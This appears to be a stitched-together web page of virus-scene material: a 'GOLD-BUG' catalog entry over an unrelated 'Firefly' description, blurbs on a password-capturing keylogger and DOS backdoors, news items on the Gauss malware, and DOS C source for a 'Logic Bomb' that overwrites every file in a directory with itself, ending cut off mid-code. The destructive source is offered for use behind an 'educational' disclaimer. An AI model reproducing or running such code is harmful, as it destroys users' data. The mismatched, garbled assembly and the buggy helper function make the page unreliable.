GOLD-BUG Virus

Virus Name:  GOLD-BUG
Aliases:     AU, GOLD, GOLD-FEVER, GOLD-MINE
V Status:    New, Research
Discovery:   January, 1994
Symptoms:    CMOS checksum failure; Creates files with no extension. Modem answers on 7th ring; BSC but it is hidden; Most virus scanners fail to run or are Deleted; CHKLIST.??? files deleted.
Origin:      USA
Eff Length:  1,024 Bytes
Type Code:   SBERaRbReX - Spawning Color Video Resident and Extended HMA Memory Resident Boot-Sector and Master-Sector Infector
Detection Method:  None
Removal Instructions:  See Below

FIREFLY - More than A Smart Virus

Firefly is an encrypted, memory resident virus which infects
.COM files on load.  It incorporates code from Proto-T, 
LokJaw and YB-X viruses and, when in memory, attacks a large election of anti-virus programs as they are executed.  Anti-virus programs identified by Firefly's execute/load handler are deleted.
Firefly incorporates simple code from previous issues of the newsletter signed to de-install generic VSAFE resident virus activity
filters designed for Microsoft by Central Point Software.

Anti-Debugger Techniques

-THE-MASTER-HIDES-BEHIND-THE-MASK-

        Ok, now the AV can not even get your virus to infect their bait
files, and if they do finally manage,  they will have great problems in
getting a complete,  accurate view of what they are dealing with.

--By Sibidharan

KEYSPY : Password Capturing Made Easy

A little something I cooked up when I was bored one afternoon ...

KEYSPY is a program which is intended to capture keystrokes when a password-protected or login program is run and save them in a hidden file in the root directory. This will enable the resourceful user to find plenty of login names and passwords.

By Sibidharan v 0.90

BACKDOORS on DOS

The information in this article concerns the backdoors in MS-DOS and BIOS that can be used and abused by a virus for it's own ends!  Most of them concern the Int21h DOS services interrupt and Int13h Disk services.

Virus found in Middle East that can spy on finance transactions: Kaspersky

A new cyber surveillance virus has been found in the Middle East that can spy on financial transactions, email and social networking activity, according to a leading computer security firm, Kaspersky Lab.

Dubbed Gauss, the virus may also be capable of attacking critical infrastructure and was built in the same laboratories as Stuxnet, the computer worm widely believed to have been used by the United States and Israel to attack Iran's nuclear program, Kaspersky Lab said on Thursday.

Key facts about virus that can steal banking credentials

A new computer virus, dubbed Gauss, has been discovered in the Middle East. Researchers say can it steal banking credentials and hijack login information for social networking sites, email and instant messaging accounts. 

Cyber security firm Kaspersky Lab said Gauss is the work of the same "factory" or "factories" that built the Stuxnet worm, which attacked Iran's nuclear program. Here are some key facts about Gauss, according to Kaspersky Lab.

Logic Bomb. Actually a virus!

No Way I'm Responsible for Execution of this Bomb. This sort of viruses are called as LogicalBombs. They just replicate themselves into other files and inject itself byte by byte to other files in programmed directory. Windows based C Source Code. 

Should be used for educational purpose only.

Code:

#include<stdio.h>

#include<dos.h>

#include<dir.h>

#include<fcntl.h>

#include<conio.h>

#include<string.h>

void ext_rename(char file[])

 {

 char old[1000],ext[]="exe";

 int i,status;

 strcpy(file,old);

 for(i=0;i<strlen(file);i++)

  {

   if(file[i]=='.')

    {

     file[++i]='\0';

     break;

    }

   }

  strcat(file,ext);

  rename(old,file);

}

void main(int argc,char* argv[])

{

 char buf[512];

 char old[1000],ext[]="exe";

 int i,status;

 int source,target,byt,done;

 struct ffblk ffblk;

 clrscr();

 textcolor(BLUE);

 cprintf("--------------------------------------------------------------------------");

 printf("\nVirus: Logic Bomb 1.0\nProgrammer: SIBIDHARAN N\n");

 cprintf("--------------------------------------------------------------------------");

 textcolor(GREEN);

 printf("\n");

 cprintf("\nPress any key to start Injecting..");

 getch();

 done = findfirst("*.*",&ffblk,0);

while(!done)

{

  printf("\n");

  textcolor(YELLOW);

  cprintf(" %s ", ffblk.ff_name);

  printf("is converted into a");

  textcolor(RED);

  cprintf(" Logicbomb");

  source=open(argv[0],O_RDONLY|O_BINARY);

  target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONLY);

  while(1)

   {

     byt=read(source,buf,512);

     if(byt>0)

     write(target,buf,byt);

      else

       break;

   }

  close(source);

  close(target);

  done = findnext(&ffblk);

 }

getch();

}

Not Actually A Virus

This is not actually a virus, but there it's being detected as a virus. Reasons are quoted below..!

Code:
#include<stdio.h>
#include<conio.h>
union abc